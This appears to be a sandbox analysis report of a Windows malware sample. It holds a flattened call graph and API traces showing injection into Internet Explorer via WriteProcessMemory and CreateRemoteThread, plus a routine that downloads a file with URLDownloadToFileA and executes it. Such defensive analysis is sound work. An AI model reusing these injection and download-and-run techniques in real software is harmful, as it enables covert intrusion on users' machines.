TlsGetValue TlsGetValue 6694->6697 6695->6693 6696 402580 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 6695->6696 6696->6693 6697->6695 6699 402d6c LocalAlloc TlsSetValue TlsGetValue TlsGetValue 6698->6699 6700 402de7 6699->6700 6700->6676 6702 404164 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 6701->6702 6703 402588 6702->6703 6703->6688 6705 403ba4 6704->6705 6706 403c05 6704->6706 6707 403a24 6705->6707 6708 403bac 6705->6708 6713 403a94 17 API calls 6707->6713 6714 403a38 6707->6714 6708->6706 6709 403bbb 6708->6709 6711 403a24 17 API calls 6708->6711 6712 403a94 17 API calls 6709->6712 6710 403a66 6710->6543 6711->6709 6716 403bd5 6712->6716 6713->6714 6714->6710 6715 40248c 17 API calls 6714->6715 6715->6710 6717 403a24 17 API calls 6716->6717 6718 403c01 6717->6718 6718->6543 6720 402764 4 API calls 6719->6720 6721 4027d1 6720->6721 6721->6546 6738 403ee0 6722->6738 6739 403eeb 6738->6739 6740 403078 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 6739->6740 6741 403ef6 6740->6741 6752->5869 6753->5871 6754->5873 6755->5882 6762 408183 6761->6762 6764 4080eb 6761->6764 6763 4039f4 17 API calls 6762->6763 6765 40819d 6763->6765 6764->6762 6766 40810e DeleteUrlCacheEntry 6764->6766 6779 4081e8 6765->6779 6767 404f2c 18 API calls 6766->6767 6768 40811c 6767->6768 6769 403b5c 17 API calls 6768->6769 6770 408129 6769->6770 6771 408131 DeleteFileA 6770->6771 6772 404f2c 18 API calls 6771->6772 6773 408143 6772->6773 6774 403b5c 17 API calls 6773->6774 6775 408150 6774->6775 6776 408165 URLDownloadToFileA 6775->6776 6776->6762 6777 408171 6776->6777 6778 40817d DeleteUrlCacheEntry 6777->6778 6778->6762 6780 4083a8 6779->6780 6782 40820e 6779->6782 6781 4039f4 17 API calls 6780->6781 6783 4083c2 6781->6783 6782->6780 6784 408231 DeleteUrlCacheEntry 6782->6784 6783->5916 6785 404f2c 18 API calls 6784->6785 6786 40823f 6785->6786 6787 403b5c 17 API calls 6786->6787 6788 40824c 6787->6788 6789 408254 DeleteFileA 6788->6789 6790 404f2c 18 API calls 6789->6790 6791 408266 6790->6791 6792 403b5c 17 API calls 6791->6792 6793 408273 6792->6793 6794 408288 URLDownloadToFileA 6793->6794 6795 408294 Sleep 6794->6795 6796 40829e 6794->6796 6795->6796 6797 404f2c 18 API calls 6796->6797 6798 4082a6 6797->6798 6799 403b5c 17 API calls 6798->6799 6800 4082b3 6799->6800 6801 404cf4 4 API calls 6800->6801 6802 4082bb 6801->6802 6802->6780 6803 404f2c 18 API calls 6802->6803 6804 4082cb 6803->6804 6805 403b5c 17 API calls 6804->6805 6806 4082d8 6805->6806 6807 4027bc 4 API calls 6806->6807 6808 4082ef 6807->6808 6809 402560 4 API calls 6808->6809 6810 4082f4 6809->6810 6811 402dec 17 API calls 6810->6811 6812 408304 6811->6812 6813 402e58 4 API calls 6812->6813 6814 40830e 6813->6814 6815 402560 4 API calls 6814->6815 6816 408313 6815->6816 6817 402ba8 4 API calls 6816->6817 6818 40831d 6817->6818 6819 402560 4 API calls 6818->6819 6820 408322 6819->6820 6821 404af8 20 API calls 6820->6821 6822 408345 6821->6822 6823 408373 6822->6823 6824 408358 6822->6824 6826 40837f DeleteUrlCacheEntry 6823->6826 6825 404af8 20 API calls 6824->6825 6825->6823 6827 404f2c 18 API calls 6826->6827 6828 40838d 6827->6828 6829 403b5c 17 API calls 6828->6829 6830 40839a 6829->6830 6831 4083a2 DeleteFileA 6830->6831 6831->6780 6833 403a94 17 API calls 6832->6833 6834 403ad0 6833->6834 6835 4039d0 17 API calls 6834->6835 6836 403ae8 6835->6836 6836->5638 6836->5639 6838 402f9e 6837->6838 6873 402eb0 6838->6873 6842 402c76 6841->6842 6843 402c4d 6841->6843 6845 402580 4 API calls 6842->6845 6843->6842 6844 402c53 GetFileSize 6843->6844 6846 402c64 6844->6846 6847 402c69 6844->6847 6845->6847 6886 402590 GetLastError 6846->6886 6847->5654 6850 402fd5 6849->6850 6851 402fbc SetFilePointer 6849->6851 6852 402590 GetLastError 6851->6852 6853 402fd4 6851->6853 6854 402580 4 API calls 6852->6854 6853->5657 6855 40259a 6854->6855 6855->5657 6889 402afc 6856->6889 6860 404d57 6859->6860 6861 404d70 6860->6861 6862 404d79 6860->6862 6863 4039d0 17 API calls 6861->6863 6865 403da4 17 API calls 6862->6865 6864 404d77 6863->6864 6866 403da4 6864->6866 6865->6864 6867 403dd6 6866->6867 6868 403da9 6866->6868 6869 4039d0 17 API calls 6867->6869 6868->6867 6871 403dbd 6868->6871 6870 403dcc 6869->6870 6870->5682 6872 403ac0 17 API calls 6871->6872 6872->6870 6874 402ec7 6873->6874 6875 402edc 6873->6875 6874->6875 6876 402f72 6874->6876 6885 402580 4 API calls 6874->6885 6877 402f59 GetStdHandle 6875->6877 6882 402ef9 CreateFileA 6875->6882 6881 402580 4 API calls 6876->6881 6879 402f50 6877->6879 6883 402f55 6879->6883 6884 402f79 GetLastError 6879->6884 6881->6883 6882->6879 6883->5650 6884->6876 6885->6875 6887 402580 4 API calls 6886->6887 6888 40259a 6887->6888 6888->6847 6890 402b16 ReadFile 6889->6890 6891 402b6e 6889->6891 6892 402b2d GetLastError 6890->6892 6893 402b3e 6890->6893 6894 402580 4 API calls 6891->6894 6895 402580 4 API calls 6892->6895 6896 402b37 6893->6896 6897 402580 4 API calls 6893->6897 6894->6896 6895->6896 6896->5662 6897->6896 6899 405135 6898->6899 6900 403b3c 17 API calls 6898->6900 6909 4026c8 6899->6909 6900->6899 6903 403c14 17 API calls 6904 405168 6903->6904 6905 405173 WinExec 6904->6905 6906 405186 6905->6906 6907 4039f4 17 API calls 6906->6907 6908 405196 6907->6908 6908->5599 6910 4039d0 17 API calls 6909->6910 6911 4026dc 6910->6911 6912 4026e0 GetModuleFileNameA 6911->6912 6913 4026fe GetCommandLineA 6911->6913 6914 403ac0 17 API calls 6912->6914 6915 402705 6913->6915 6916 4026fc 6914->6916 6915->6916 6918 4025dc 6915->6918 6916->6903 6919 4025ee 6918->6919 6920 4025e6 CharNextA 6919->6920 6926 402608 6919->6926 6920->6919 6921 402657 6922 403e74 17 API calls 6921->6922 6925 402660 6922->6925 6923 402612 CharNextA 6923->6926 6924 402643 CharNextA 6924->6926 6929 4026bf 6925->6929 6930 4026a4 CharNextA 6925->6930 6931 40266c CharNextA 6925->6931 6932 402676 CharNextA 6925->6932 6933 40269a CharNextA 6925->6933 6926->6921 6926->6923 6926->6924 6927 40261c CharNextA 6926->6927 6928 402639 CharNextA 6926->6928 6927->6926 6928->6926 6929->6915 6930->6925 6931->6925 6932->6925 6933->6925 6934->5746 7316 401957 7317 401934 7316->7317 7318 401947 RtlDeleteCriticalSection 7317->7318 7319 40193d RtlLeaveCriticalSection 7317->7319 7319->7318 7320 438154 7321 438159 7320->7321 7322 4381fa 4 API calls 7321->7322 7322->7321 7258 4038d8 7260 4038dc 7258->7260 7259 403922 7261 4036c8 10 API calls 7259->7261 7260->7259 7262 403854 5 API calls 7260->7262 7263 40393e 7261->7263 7262->7259 7264 403964 FreeLibrary 7263->7264 7265 40396a 7263->7265 7264->7265 7266 40399f 7265->7266 7267 403997 ExitProcess 7265->7267 7268 4050d8 GetEnvironmentVariableA 7269 403b3c 17 API calls 7268->7269 7270 405135 7269->7270 7271 4026c8 28 API calls 7270->7271 7272 40514d 7271->7272 7273 403c14 17 API calls 7272->7273 7274 405168 7273->7274 7275 405173 WinExec 7274->7275 7276 405186 7275->7276 7277 4039f4 17 API calls 7276->7277 7278 405196 7277->7278 6964 40285c CloseHandle 7585 4027de ReadFile 7586 402807 GetLastError 7585->7586 7587 402811 7585->7587 7586->7587 7439 4035e0 7440 4035f1 7439->7440 7442 403652 7439->7442 7441 4035fa UnhandledExceptionFilter 7440->7441 7443 403540 7440->7443 7441->7442 7441->7443 7443->7442 7444 4024fc 17 API calls 7443->7444 7445 4035dc 7444->7445 7446 4031ea 7447 4031db RegCloseKey 7446->7447 7055 40286c 7060 40285c CloseHandle 7055->7060 7057 40287c 7058 402880 GetLastError 7057->7058 7059 402887 7057->7059 7060->7057 7061 401873 7062 40185a 7061->7062 7063 401863 RtlLeaveCriticalSection 7062->7063 7064 40186d 7062->7064 7063->7064 7545 403773 7546 4036c8 10 API calls 7545->7546 7547 403778 7546->7547 7552 4034a4 7547->7552 7549 40377d 7555 4034f8 7549->7555 7553 404164 4 API calls 7552->7553 7554 4034b4 7553->7554 7554->7549 7556 404164 4 API calls 7555->7556 7557 4034fd 7556->7557 7592 4053f6 7593 4053f8 GetClassNameA 7592->7593 7609 4053e4 7593->7609 7595 405459 7596 4054fe 7595->7596 7597 40546f SendMessageA 7595->7597 7599 4039f4 17 API calls 7596->7599 7598 4053e4 17 API calls 7597->7598 7600 405494 7598->7600 7601 40551d 7599->7601 7602 404dd0 17 API calls 7600->7602 7603 4054ab 7602->7603 7604 4054ef SendMessageA 7603->7604 7605 4053e4 17 API calls 7603->7605 7604->7596 7606 4054ca 7605->7606 7607 404dd0 17 API calls 7606->7607 7608 4054e1 7607->7608 7608->7596 7608->7604 7610 403b00 17 API calls 7609->7610 7611 4053f3 7610->7611 7611->7595 7612 4053f8 GetClassNameA 7613 4053e4 17 API calls 7612->7613 7614 405459 7613->7614 7615 4054fe 7614->7615 7616 40546f SendMessageA 7614->7616 7618 4039f4 17 API calls 7615->7618 7617 4053e4 17 API calls 7616->7617 7619 405494 7617->7619 7620 40551d 7618->7620 7621 404dd0 17 API calls 7619->7621 7622 4054ab 7621->7622 7623 4054ef SendMessageA 7622->7623 7624 4053e4 17 API calls 7622->7624 7623->7615 7625 4054ca 7624->7625 7626 404dd0 17 API calls 7625->7626 7627 4054e1 7626->7627 7627->7615 7627->7623 6947 4381fa 6948 438214 6947->6948 6949 438231 VirtualAlloc 6948->6949 6951 43851d 6948->6951 6950 438273 6949->6950 6949->6951 6953 43827e 6950->6953 6954 438294 6953->6954 6956 43834b 6954->6956 6957 43835e VirtualFree 6956->6957 6960 438408 6957->6960 6959 438524 LoadLibraryA 6963 43844c 6959->6963 6960->6959 6961 4384f9 VirtualProtect 6961->6961 6962 438518 6961->6962 6963->6961 6963->6962 7065 404079 7073 403144 GetKeyboardType 7065->7073 7069 4040a7 7070 4040cc GetCommandLineA 7069->7070 7080 4010c8 GetStartupInfoA 7070->7080 7074 403153 GetKeyboardType 7073->7074 7075 403166 7073->7075 7074->7075 7075->7069 7076 403174 RegOpenKeyExA 7075->7076 7077 4031ec 7076->7077 7078 40319f RegQueryValueExA 7076->7078 7077->7069 7079 4031db RegCloseKey 7078->7079 7079->7069 7081 4010de GetCurrentThreadId 7080->7081 7481 402afa 7482 402afc 7481->7482 7483 402b16 ReadFile 7482->7483 7484 402b6e 7482->7484 7485 402b2d GetLastError 7483->7485 7486 402b3e 7483->7486 7487 402580 4 API calls 7484->7487 7488 402580 4 API calls 7485->7488 7489 402b37 7486->7489 7490 402580 4 API calls 7486->7490 7487->7489 7488->7489 7490->7489 6965 4024fc 6968 4039b8 6965->6968 6971 4038e0 6968->6971 6973 4038f9 6971->6973 6972 403922 6988 4036c8 6972->6988 6973->6972 6981 403854 6973->6981 6976 40393e 6977 403964 FreeLibrary 6976->6977 6978 40396a 6976->6978 6977->6978 6979 40399f 6978->6979 6980 403997 ExitProcess 6978->6980 6982 4038b5 6981->6982 6983 40385e 6981->6983 6985 4038d1 6982->6985 6986 4038be MessageBoxA 6982->6986 6984 40387d GetStdHandle WriteFile GetStdHandle WriteFile 6983->6984 6987 403872 6983->6987 6984->6972 6985->6972 6986->6985 6987->6984 6989 403704 6988->6989 6990 4036da 6988->6990 6989->6976 6990->6989 6993 404024 6990->6993 7003 404022 6990->7003 6994 404060 6993->6994 6995 40403d 6993->6995 6994->6990 6996 402ba8 4 API calls 6995->6996 6997 404047 6996->6997 6998 402ba8 4 API calls 6997->6998 6999 404051 6998->6999 7000 402ba8 4 API calls 6999->7000 7001 40405b 7000->7001 7013 40187c 7001->7013 7004 404024 7003->7004 7005 404060 7004->7005 7006 402ba8 4 API calls 7004->7006 7005->6990 7007 404047 7006->7007 7008 402ba8 4 API calls 7007->7008 7009 404051 7008->7009 7010 402ba8 4 API calls 7009->7010 7011 40405b 7010->7011 7012 40187c 6 API calls 7011->7012 7012->7005 7014 401959 7013->7014 7015 40188d 7013->7015 7014->6994 7016 4018a4 RtlEnterCriticalSection 7015->7016 7017 4018ae LocalFree 7015->7017 7016->7017 7018 4018e1 7017->7018 7019 4018cf VirtualFree 7018->7019 7020 4018e9 7018->7020 7019->7018 7021 401910 LocalFree 7020->7021 7022 401927 7020->7022 7021->7021 7021->7022 7023 401947 RtlDeleteCriticalSection 7022->7023 7024 40193d RtlLeaveCriticalSection 7022->7024 7023->6994 7024->7023 7466 439a7e 7467 439a83 7466->7467 7468 439aa1 7467->7468 7469 439c54 15 API calls 7467->7469 7470 439c51 7469->7470 7491 402e86 7496 40285c CloseHandle 7491->7496 7493 402e9b 7494 402ea4 7493->7494 7495 402590 5 API calls 7493->7495 7495->7494 7496->7493 7628 403f88 7629 403f62 7628->7629 7630 4034f8 4 API calls 7628->7630 7630->7629 7025 40288c 7026 4028a2 7025->7026 7027 402904 CreateFileA 7026->7027 7028 4029b6 GetStdHandle 7026->7028 7037 4028a8 7026->7037 7029 402922 7027->7029 7030 402a2a GetLastError 7027->7030 7028->7030 7033 4029f1 7028->7033 7032 402930 GetFileSize 7029->7032 7029->7033 7030->7037 7032->7030 7035 402944 SetFilePointer 7032->7035 7034 4029fb GetFileType 7033->7034 7033->7037 7036 402a16 CloseHandle 7034->7036 7034->7037 7035->7030 7039 402960 ReadFile 7035->7039 7036->7037 7039->7030 7040 402982 7039->7040 7040->7033 7041 402995 SetFilePointer 7040->7041 7041->7030 7042 4029aa SetEndOfFile 7041->7042 7042->7030 7043 4029b4 7042->7043 7043->7033 7090 404412 7091 404414 CreateWindowExA 7090->7091 7562 403713 7563 4036c8 10 API calls 7562->7563 7564 403718 7563->7564 7565 4034a4 4 API calls 7564->7565 7566 40371d 7565->7566 7567 403722 7566->7567 7568 4034f8 4 API calls 7566->7568 7568->7567 7497 404a98 7498 404ab1 NtdllDefWindowProc_A 7497->7498 7499 404aa8 PostQuitMessage 7497->7499 7500 404ac5 7498->7500 7499->7500 7501 43829a 7502 4382bd 7501->7502 7503 43834b 3 API calls 7502->7503 5339 402820 5340 402830 WriteFile 5339->5340 5342 40282c 5339->5342 5341 402848 GetLastError 5340->5341 5340->5342 5341->5342 7504 401ea5 7505 401ebd 7504->7505 7506 401eb8 7504->7506 7508 401ec9 7505->7508 7509 401ef4 7505->7509 7510 401eea RtlEnterCriticalSection 7505->7510 7507 4017b8 4 API calls 7506->7507 7507->7505 7509->7508 7515 401db0 7509->7515 7510->7509 7513 402015 RtlLeaveCriticalSection 7514 40201f 7513->7514 7519 401dc0 7515->7519 7516 401dec 7517 401bc4 9 API calls 7516->7517 7520 401e10 7516->7520 7517->7520 7518 401d24 12 API calls 7518->7519 7519->7516 7519->7518 7519->7520 7520->7513 7520->7514 7631 4023a9 7632 4023bc 7631->7632 7633 4023c1 7631->7633 7636 4017b8 4 API calls 7632->7636 7634 4023f0 7633->7634 7635 4023e6 RtlEnterCriticalSection 7633->7635 7640 4023c5 7633->7640 7646 4021d8 7634->7646 7635->7634 7636->7633 7639 4023fd 7642 402458 7639->7642 7643 40244e RtlLeaveCriticalSection 7639->7643 7643->7642 7644 402409 7644->7639 7645 402034 9 API calls 7644->7645 7645->7639 7647 4021ec 7646->7647 7649 402290 7647->7649 7651 40220d 7647->7651 7648 40221c 7648->7639 7656 401ea4 7648->7656 7649->7648 7650 401c4c 9 API calls 7649->7650 7654 40232d 7649->7654 7667 401d50 7649->7667 7650->7649 7651->7648 7653 401a20 9 API calls 7651->7653 7653->7648 7654->7648 7655 401bc4 9 API calls 7654->7655 7655->7648 7657 401ea5 7656->7657 7658 401ebd 7657->7658 7659 4017b8 4 API calls 7657->7659 7660 401eea RtlEnterCriticalSection 7658->7660 7661 401ef4 7658->7661 7664 401ec9 7658->7664 7659->7658 7660->7661 7662 401db0 12 API calls 7661->7662 7661->7664 7663 401ffc 7662->7663 7665 402015 RtlLeaveCriticalSection 7663->7665 7666 40201f 7663->7666 7664->7644 7665->7666 7666->7644 7672 401608 7667->7672 7669 401d65 7670 401c98 9 API calls 7669->7670 7671 401d72 7669->7671 7670->7671 7671->7649 7673 401627 7672->7673 7674 401334 LocalAlloc VirtualAlloc VirtualAlloc VirtualFree 7673->7674 7675 4016db 7673->7675 7676 4011cc LocalAlloc 7673->7676 7678 4016c1 7673->7678 7680 401676 7673->7680 7674->7673 7677 401464 VirtualAlloc 7675->7677 7681 401687 7675->7681 7676->7673 7677->7681 7679 4013ac VirtualFree 7678->7679 7679->7681 7682 4013ac VirtualFree 7680->7682 7681->7669 7682->7681 7525 4042aa 7526 4042ac CreateMutexA 7525->7526 7106 40102e RaiseException 5343 401db0 5347 401dc0 5343->5347 5344 401dec 5348 401e10 5344->5348 5354 401bc4 5344->5354 5347->5344 5347->5348 5349 401d24 5347->5349 5358 401578 5349->5358 5351 401d34 5352 401d41 5351->5352 5367 401c98 5351->5367 5352->5347 5355 401c19 5354->5355 5356 401be2 5354->5356 5355->5356 5433 401b14 5355->5433 5356->5348 5359 401594 5358->5359 5361 40159e 5359->5361 5363 4015aa 5359->5363 5365 4015ef 5359->5365 5378 4012d0 5359->5378 5386 4011cc 5359->5386 5374 401464 5361->5374 5363->5351 5390 4013ac 5365->5390 5400 401c4c 5367->5400 5370 4011cc LocalAlloc 5372 401cbc 5370->5372 5371 401cc4 5371->5352 5372->5371 5404 4019f0 5372->5404 5375 4014aa 5374->5375 5376 4014c6 VirtualAlloc 5375->5376 5377 4014da 5375->5377 5376->5375 5376->5377 5377->5363 5379 4012df VirtualAlloc 5378->5379 5381 40130c 5379->5381 5382 40132f 5379->5382 5394 401184 5381->5394 5382->5359 5385 40131c VirtualFree 5385->5382 5387 4011e8 5386->5387 5388 401184 LocalAlloc 5387->5388 5389 40122f 5388->5389 5389->5359 5393 4013db 5390->5393 5391 401434 5391->5363 5392 401408 VirtualFree 5392->5393 5393->5391 5393->5392 5397 40112c 5394->5397 5398 401138 LocalAlloc 5397->5398 5399 40114a 5397->5399 5398->5399 5399->5382 5399->5385 5401 401c5e 5400->5401 5402 401c55 5400->5402 5401->5370 5402->5401 5409 401a20 5402->5409 5405 4019fe 5404->5405 5407 401a0d 5404->5407 5406 401bc4 9 API calls 5405->5406 5408 401a0b 5406->5408 5407->5371 5408->5371 5412 402034 5409->5412 5411 401a41 5411->5401 5413 40204d 5412->5413 5416 402052 5412->5416 5426 4017b8 RtlInitializeCriticalSection 5413->5426 5415 402083 RtlEnterCriticalSection 5419 40208d 5415->5419 5416->5415 5416->5419 5420 402056 5416->5420 5417 402099 5421 4021c5 5417->5421 5422 4021bb RtlLeaveCriticalSection 5417->5422 5418 40211c 5418->5420 5423 401c4c 7 API calls 5418->5423 5419->5417 5419->5418 5424 402148 5419->5424 5420->5411 5421->5411 5422->5421 5423->5420 5424->5417 5425 401bc4 7 API calls 5424->5425 5425->5417 5427 4017dc RtlEnterCriticalSection 5426->5427 5428 4017e6 5426->5428 5427->5428 5429 401804 LocalAlloc 5428->5429 5430 40181e 5429->5430 5431 401863 RtlLeaveCriticalSection 5430->5431 5432 40186d 5430->5432 5431->5432 5432->5416 5435 401b2a 5433->5435 5434 401bb2 5434->5356 5435->5434 5436 401b55 5435->5436 5437 401b69 5435->5437 5446 40172c 5436->5446 5439 40172c 3 API calls 5437->5439 5440 401b67 5439->5440 5440->5434 5441 4019f0 9 API calls 5440->5441 5442 401b8d 5441->5442 5443 401ba7 5442->5443 5456 401a44 5442->5456 5461 401240 5443->5461 5447 401752 5446->5447 5448 4017ab 5446->5448 5465 4014f8 5447->5465 5448->5440 5451 4011cc LocalAlloc 5452 40176f 5451->5452 5453 401786 5452->5453 5454 4013ac VirtualFree 5452->5454 5453->5448 5455 401240 LocalAlloc 5453->5455 5454->5453 5455->5448 5457 401a57 5456->5457 5458 401a49 5456->5458 5457->5443 5459 401a20 9 API calls 5458->5459 5460 401a56 5459->5460 5460->5443 5462 40124b 5461->5462 5463 401184 LocalAlloc 5462->5463 5464 401266 5462->5464 5463->5464 5464->5434 5467 40152f 5465->5467 5466 40156f 5466->5451 5467->5466 5468 401549 VirtualFree 5467->5468 5468->5467 7295 439cb6 7296 439cbd 7295->7296 7297 439cc7 15 API calls 7296->7297 7298 439cc6 7297->7298 7107 439c35 7108 439c47 7107->7108 7111 439c54 7108->7111 7112 439c79 7111->7112 7115 439cc7 7112->7115 7116 439ced 7115->7116 7117 439d06 VirtualAlloc 7116->7117 7118 439d2a 14 API calls 7117->7118 7119 40103e RtlUnwind 7331 40353e 7332 403540 7331->7332 7333 4024fc 17 API calls 7332->7333 7334 4035dc 7333->7334 7569 40333e 7574 403421 7569->7574 7575 403351 7569->7575 7570 4033c4 7571 4033b9 7570->7571 7572 4033df UnhandledExceptionFilter 7570->7572 7573 404164 4 API calls 7571->7573 7572->7571 7572->7574 7573->7574 7575->7570 7575->7574 7576 4033a4 UnhandledExceptionFilter 7575->7576 7576->7571 7576->7574

                                                                            Executed Functions

                                                                            Function 00741BC1 Relevance: 131.8, APIs: 68, Strings: 7, Instructions: 507libraryloaderthreadCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 007418A1: GetVersionExA.KERNEL32(?), ref: 007418BB
                                                                            • LoadLibraryA.KERNEL32(Kernel32.dll), ref: 00741BE9
                                                                            • GetProcAddress.KERNEL32(?), ref: 00741CD0
                                                                            • GetProcAddress.KERNEL32(?), ref: 00741CDE
                                                                            • GetProcAddress.KERNEL32(?), ref: 00741CEC
                                                                            • GetProcAddress.KERNEL32(?), ref: 00741CFA
                                                                            • GetProcAddress.KERNEL32(?), ref: 00741D08
                                                                            • GetProcAddress.KERNEL32(?), ref: 00741D16
                                                                            • GetProcAddress.KERNEL32(?), ref: 00741D24
                                                                            • GetProcAddress.KERNEL32(?), ref: 00741D32
                                                                            • GetProcAddress.KERNEL32(?), ref: 00741D40
                                                                            • GetProcAddress.KERNEL32(?), ref: 00741D4E
                                                                            • GetProcAddress.KERNEL32(?), ref: 00741D5C
                                                                            • GetProcAddress.KERNEL32(?), ref: 00741D6A
                                                                            • GetProcAddress.KERNEL32(?), ref: 00741D78
                                                                            • GetProcAddress.KERNEL32(?), ref: 00741D86
                                                                            • GetProcAddress.KERNEL32(?), ref: 00741D94
                                                                            • GetProcAddress.KERNEL32(?), ref: 00741DA2
                                                                            • GetProcAddress.KERNEL32(?), ref: 00741DB0
                                                                            • GetProcAddress.KERNEL32(?), ref: 00741DBE
                                                                            • GetProcAddress.KERNEL32(?), ref: 00741DCC
                                                                            • GetProcAddress.KERNEL32(?), ref: 00741DDA
                                                                            • GetProcAddress.KERNEL32(?), ref: 00741DE8
                                                                            • GetProcAddress.KERNEL32(?), ref: 00741DF6
                                                                            • GetProcAddress.KERNEL32(?), ref: 00741E04
                                                                            • GetProcAddress.KERNEL32(?), ref: 00741E12
                                                                            • GetProcAddress.KERNEL32(?), ref: 00741E20
                                                                            • LoadLibraryA.KERNEL32(Wininet.dll), ref: 00741E32
                                                                            • GetProcAddress.KERNEL32(00000000), ref: 00741E48
                                                                            • GetProcAddress.KERNEL32(?), ref: 00741E58
                                                                            • GetProcAddress.KERNEL32(?), ref: 00741E68
                                                                            • GetProcAddress.KERNEL32(?), ref: 00741E78
                                                                            • GetProcAddress.KERNEL32(?), ref: 00741E88
                                                                            • GetProcAddress.KERNEL32(?), ref: 00741E98
                                                                            • LoadLibraryA.KERNEL32(Urlmon.dll), ref: 00741EA4
                                                                            • GetProcAddress.KERNEL32(00000000), ref: 00741EB5
                                                                            • LoadLibraryA.KERNEL32(Psapi.dll), ref: 00741EC4
                                                                            • GetProcAddress.KERNEL32(00000000), ref: 00741ED3
                                                                            • GetProcAddress.KERNEL32(00000000), ref: 00741EE1
                                                                            • GetProcAddress.KERNEL32(00000000), ref: 00741EEF
                                                                            • OpenProcess.KERNEL32(0000042A,00000000,00000000), ref: 00741FC0
                                                                            • CreateProcessA.KERNEL32(?,00000000,00000000,00000000,00000000,00000084,00000000,00000000,?,?), ref: 00742047
                                                                            • GetInputState.USER32 ref: 00742055
                                                                            • GetCurrentThreadId.KERNEL32 ref: 0074205E
                                                                            • PostThreadMessageA.USER32(00000000), ref: 00742065
                                                                            • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 00742075
                                                                            • ReadProcessMemory.KERNEL32(?,?,007422C8,00000032,?), ref: 0074208C
                                                                            • VirtualAllocEx.KERNEL32(?,00000000,741C5C2D,00001000,00000040), ref: 007420BF
                                                                            • WriteProcessMemory.KERNEL32(?,00000000,?,741C5C2D,?), ref: 007420ED
                                                                            • VirtualFreeEx.KERNEL32(?,00000000,00000000,00008000), ref: 007420FD
                                                                            • WriteProcessMemory.KERNEL32(?,00000001,?,00000004,?), ref: 00742158
                                                                            • WriteProcessMemory.KERNEL32(?,-00000006,?,00000004,?), ref: 0074216B
                                                                            • WriteProcessMemory.KERNEL32(?,00741C1B,00742358,00000004,?), ref: 00742189
                                                                            • VirtualProtectEx.KERNEL32(?,?,00000032,00000040,?), ref: 007421B7
                                                                            • WriteProcessMemory.KERNEL32(?,?,?,00000032,?), ref: 007421D0
                                                                            • WriteProcessMemory.KERNEL32(?,?,0074235C,00000004,?), ref: 007421F0
                                                                            • ResumeThread.KERNEL32(?), ref: 007421FA
                                                                            • GetInputState.USER32 ref: 00742200
                                                                            • GetCurrentThreadId.KERNEL32 ref: 00742209
                                                                            • PostThreadMessageA.USER32(00000000), ref: 00742210
                                                                            • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 00742220
                                                                            • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00742236
                                                                            • CreateRemoteThread.KERNEL32(?,00000000,00000000,00741C1A,00000000,00000000,?), ref: 00742252
                                                                            • SetThreadPriority.KERNEL32(00000000,00000002), ref: 00742268
                                                                            • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 00742271
                                                                            • VirtualFreeEx.KERNEL32(?,00741C0A,00000000,00008000), ref: 00742283
                                                                            • CloseHandle.KERNEL32(00000000), ref: 00742290
                                                                            • CloseHandle.KERNEL32(?), ref: 00742295
                                                                            • CloseHandle.KERNEL32(?), ref: 0074229A
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000003.2016766274.0000000000740000.00000040.00001000.00020000.00000000.sdmp, Offset: 00740000, based on PE: true
                                                                            • Associated: 00000000.00000003.2016766274.0000000000745000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_3_740000_sxs.jbxd
                                                                            Similarity
                                                                            • API ID: AddressProc$Process$MemoryThread$Write$LibraryLoadMessageVirtual$CloseHandle$CreateCurrentFreeInputObjectPostSingleStateWait$AllocOpenPriorityProtectReadRemoteResumeVersion
                                                                            • String ID: 2$IEXPLORE.EXE$Kernel32.dll$Psapi.dll$Urlmon.dll$Wininet.dll$_Y
                                                                            • API String ID: 742397454-3370953745
                                                                            • Opcode ID: 96af4d441d46fc301b740a5b82f0225b21cefff780600eb2350bdd0ca4e60926
                                                                            • Instruction ID: 44a15ee7f3550474fac5bc6e8fc29948b99346555f72798e68ad0e8b5e05ed30
                                                                            • Opcode Fuzzy Hash: 96af4d441d46fc301b740a5b82f0225b21cefff780600eb2350bdd0ca4e60926
                                                                            • Instruction Fuzzy Hash: D8123D79900258EFDB11EFA5DC84DAE7FB9FB4A740B80802BF90492231D7394991DF68
                                                                            Function 00407BEC Relevance: 15.8, APIs: 5, Strings: 4, Instructions: 94sleepfilenetworkCOMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            APIs
                                                                              • Part of subcall function 00404F2C: GetWindowsDirectoryA.KERNEL32(?,00000104,?,00407C31,00000000,00407D2A,?,00000000,00000000,00000000,00000000,00000000), ref: 00404F3F
                                                                            • URLDownloadToFileA.URLMON(00000000,00000000,00000000,00000000,00000000), ref: 00407C7F
                                                                            • Sleep.KERNEL32(000001F4,00000000,00407D2A,?,00000000,00000000,00000000,00000000,00000000), ref: 00407C8D
                                                                            • CopyFileA.KERNEL32(00000000,00000000,00000000), ref: 00407CD0
                                                                            • Sleep.KERNEL32(000001F4,00000000,00407D2A,?,00000000,00000000,00000000,00000000,00000000), ref: 00407CDA
                                                                            • ShellExecuteA.SHELL32(00000000,open,00000000,00000000,00000000,00000001), ref: 00407D0A
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2038596081.0000000000401000.00000004.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2038541464.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2038596081.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2038596081.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2038596081.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2038875021.0000000000438000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2039027110.0000000000446000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_sxs.jbxd
